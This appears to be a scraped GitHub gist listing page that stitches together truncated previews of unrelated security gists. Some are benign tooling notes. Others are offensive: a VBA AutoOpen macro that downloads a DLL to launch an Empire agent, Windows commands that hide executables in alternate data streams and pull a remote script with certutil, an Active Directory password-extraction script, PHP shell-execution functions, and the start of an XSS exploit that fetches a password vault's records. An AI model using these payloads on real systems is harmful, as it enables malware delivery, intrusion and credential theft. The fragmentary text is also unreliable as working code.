<system.web>
<deployment retail="true"/>
</system.web>
Never Mind secfb
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # file: merger.py | |
| # based off: http://cmikavac.net/2011/07/09/merging-multiple-nessus-scans-python-script/ | |
| # by: mastahyeti | |
| import xml.etree.ElementTree as etree | |
| import shutil | |
| import os | |
| first = 1 | |
| for fileName in os.listdir("."): |
marcbarry
/ machine.config.markdown
Last active
August 13, 2021 17:05
Security hardening pointers for web.config and machine.config
achillean
/ http-components.csv
Last active
June 29, 2021 08:31
Sample output from the Shodan CLI running: shodan stats --facets http.component:100,port:20 http-components http
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Query | http | |||
|---|---|---|---|---|
| http.component | port | |||
| jQuery | 1250676 | 80 | 56553138 | |
| Zepto | 483672 | 7547 | 50655465 | |
| PHP | 266668 | 443 | 26476433 | |
| Twitter Bootstrap | 255045 | 4567 | 11633390 | |
| Google Font API | 211921 | 8080 | 8631875 | |
| WordPress | 139645 | 1900 | 4540344 | |
| Font Awesome | 133483 | 49152 | 3028740 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| License: MIT License | |
| Copyright (c) 2023 Miel Donkers | |
| Very simple HTTP server in python for logging requests | |
| Usage:: | |
| ./server.py [<port>] | |
| """ | |
| from http.server import BaseHTTPRequestHandler, HTTPServer |
vivami
/ Empire_via_rundll-powershdll.vba
Last active
April 27, 2023 23:58
VBA macro executing Empire Agent using PowerShdll via rundll
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sub AutoOpen() | |
| Debugging | |
| End Sub | |
| Sub Document_Open() | |
| Debugging | |
| End Sub | |
| Public Function Debugging() As Variant | |
| DownloadDLL |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
mgeeky
/ Get-UserPasswordEntries.ps1
Last active
March 2, 2020 14:34
Get-UserPasswordEntries - Red-Teaming script intended to look through Active Directory's LDAP/GlobalCatalog and extract every user having set userPassword property. Then to decode that property.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| This script enumerates user accounts in Active Directory and then collects | |
| their .userPassword properties, decodes them and prints out. | |
| Assuming we have PowerView's Get-DomainUser command available. | |
| Usage: | |
| PS> . .\Get-UserPasswordEntries.ps1 | |
| PS> Get-UserPasswordEntries | |
exec - Returns last line of commands output
passthru - Passes commands output directly to the browser
system - Passes commands output directly to the browser and returns last line
shell_exec - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen - Opens read or write pipe to process of a command
proc_open - Similar to popen() but greater degree of control
pcntl_exec - Executes a program
shawarkhanethicalhacker
/ password_vault_exploit.js
Created
August 20, 2018 07:26
XSS Exploit code for retrieving passwords stored in a Password Vault
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Exploit Code by Shawar Khan | |
| var data_chunks = ''; | |
| // Capturing Records from API | |
| fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
| // Holds the records in as String | |
| var allrecords = data; | |
| // converting response to JSON |
milo2012
/ pentesting_ios_apps_on_electra.txt
Last active
January 19, 2022 14:04
Pentesting IOS Applications on Electra 11.1.2
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Burp SSL Certificate on IOS 11 | |
| On iOS 11 you can't just install your MITM root cert, you also need to explicitly trust it. | |
| You can do this by: | |
| Settings -> General -> About -> Certificate Trust Settings -> Flip the switch on your cert | |
| ---------------------------------------------------------------------------------------------------------------- | |
| #GDB on IOS 11 | |
| Source: https://shmoo419.github.io/ | |
| gdb | |
| ps -ax | grep -i appName | |
| attach [processNo] |
OlderNewer